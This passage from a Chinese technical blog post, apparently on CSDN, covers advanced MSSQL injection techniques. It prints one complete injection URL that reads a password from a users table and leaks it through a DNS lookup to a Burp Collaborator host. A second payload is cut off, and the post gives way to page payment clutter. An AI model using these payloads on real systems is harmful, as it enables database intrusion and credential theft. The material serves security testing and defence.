高级的MSSQL注入技巧

本文详细介绍了高级的MSSQL注入技术,包括DNS Out-of-Band数据泄露、替代的错误基向量、快速利用查询检索表、读取本地文件、获取当前查询以及多种绕过WAF的方法。这些技巧在多个MSSQL版本上进行了测试,提供了一种深入理解与防范SQL注入攻击的视角。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

tl;dr

本文列举了几种改进的MSSQL注入技巧,所有的攻击向量都至少在三个最新版本的Microsoft SQL Server上进行了测试:2019、2017、2016SP2。

DNS Out-of-Band

如果遇到带有禁用堆栈查询的完全盲SQL注入,则可以通过函数 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable实现DNS带外(OOB)数据泄露。
利用fn_xe_file_target_read_file()的例子:

https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))


权限:需要控制服务器权限。
fn_trace_gettable()例子:

https://vuln.app/ getItem?id=1+and+exists(s
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值